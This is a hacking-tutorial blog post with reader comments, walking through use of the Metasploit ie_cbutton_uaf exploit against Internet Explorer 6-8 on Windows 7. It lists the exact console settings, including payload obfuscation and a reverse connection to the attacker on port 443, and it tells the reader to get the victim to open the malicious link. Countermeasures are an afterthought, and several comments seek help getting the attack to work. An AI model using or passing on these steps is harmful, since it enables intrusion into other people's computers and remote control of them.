• +

Hacking Windows 7 SP1 via Microsoft Internet Explorer 8

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R3

Victim O.S : Windows 7 SP1, XP, Server

Exploit Author : eromang, mahmud ab rahman, sinn3r

Merry Christmas and Happy New Year 2013 everyone, hope all of you great and healthy and always blessed especially in this new year. Actually my holiday haven't finished ๐Ÿ™‚ because I still have a plan to go to Harbin, China next week to view the ice festival there, it's such a blessing ๐Ÿ™‚ ..

Anyway, last year was closed with a security news that hit Internet Explorer 6,7,8. Even the vulnerability was exist before end of the year, but it really trending in China and Taiwan. What I know that majority of internet users in China (more than 100 million) they use internet explorer for their browsing activity that's why it's hit very hard with this vulnerability.

Here's I got from metasploit about this exploit :

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CDwnBindInfo object is freed by FollowHyperlink2, but a reference is kept in CDoc.  As a result, when the reference is used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user.

Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.

Requirement :

1. Metasploit framework

2. Windows OS with Internet Explorer v 6, 7 or 8

Step by Step :

Attacker IP Address : 192.168.8.92

Victim IP Address : 192.168.8.90

1. Open your metasploit framework console (type msfconsole from terminal) and add the exploit and payload.

in the example above I can get the ie_cbutton_uaf exploit after updating mymetasploit framework database, but you also can download it directly from this link https://github.com/rapid7/metasploitframework/blob/master/modules/exploits/windows/browser/ie_cbutton_uaf.rb

2. The next step we need to set up the needed switch to make this exploit work, but first we need to see the available options to set up for this exploit.

3. Now we need to configure the options

Description :

set obfuscate yes --> do the javascript obfuscation

set srvhost 192.168.8.92 --> set up the exploit server address

set srvport 80 --> set the port in exploit server that will be used to handle request from victim

set uripath ie --> the URI for friendly url; in this example I use ie

set lhost 192.168.8.92 --> the address for payload to connect back to attacker if exploit success

set lport 443 --> the port used for reverse connection from victim to attacker

exploit --> launch the exploit

4. The next step we need to make sure victim open the link. that already generated. In my example picture above is : Using URL : http://192.168.8.92/ie. When victim open that malicious link, the attacker will notice that.

5. To check whether new sessions created or not, you can run sessions -l command.

6. When attacker interact with that session(see picture below), then we know that it is victim machine…

We're in ๐Ÿ™‚

Countermeasures :

1. Update your browser

2. When you feel something incorrect while visiting a webpage, just leave it don't continue

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • RAJ

    Nice Tutorial. Can you Provide me Affected Version of Internet Explorer on my mail id

  • alijanlou

    hi, sorry for my english ๐Ÿ™‚
    when download ie_cbutton_uaf.rb from above link and copy to this directory : “/pentest/exploits/framework/modules/exploits/windows/browser/” and run msfconsole in terminal i recive this error :
    WARNING! The following modules could not be loaded!
    /opt/metasploit/msf3/modules/exploits/windows/browser/ie_cbutton_uaf.rb
    syntaxEroor ….etc”
    plese help me!

    • v4L

      #alijanlou

      you use the new metasploit, try to search the modules directly

      search THE_SCRIPT_NAME

      • alijanlou

        sorry i am living in iran, and in our country internet is filter (block many web site)
        when i search ie_cbutton_uaf many web site is block, can u put ie_cbutton_uaf in your host and give me download link?
        oh you have to know that your web site “vishnuvalentino.com” is filter too ๐Ÿ˜€
        tank u so much for your responding.

        • v4L

          #alijanlou

          I don’t have it right now, when I get I will updated it. You can give a try to http://dev.metasploit.com/redmine/projects/framework/repository/

          sorry about being blocked there…thanks for the information from you ๐Ÿ™‚

  • Admiral

    hello guys.

    I tried this on IE8 and its not working.

    msf exploit(ie_cbutton_uaf) >

    [*] 192.168.43.221 ie_cbutton_uaf – Requesting: /hacks

    [*] 192.168.43.221 ie_cbutton_uaf – Target selected as: IE 8 on Windows 7

    [*] 192.168.43.221 ie_cbutton_uaf – Sending HTML…

    all previous commands were executed just fine. I do not understand whats stopping it. /ie crashes but its not able to spawn meterpreter
    tried setting a payload reverse_tcp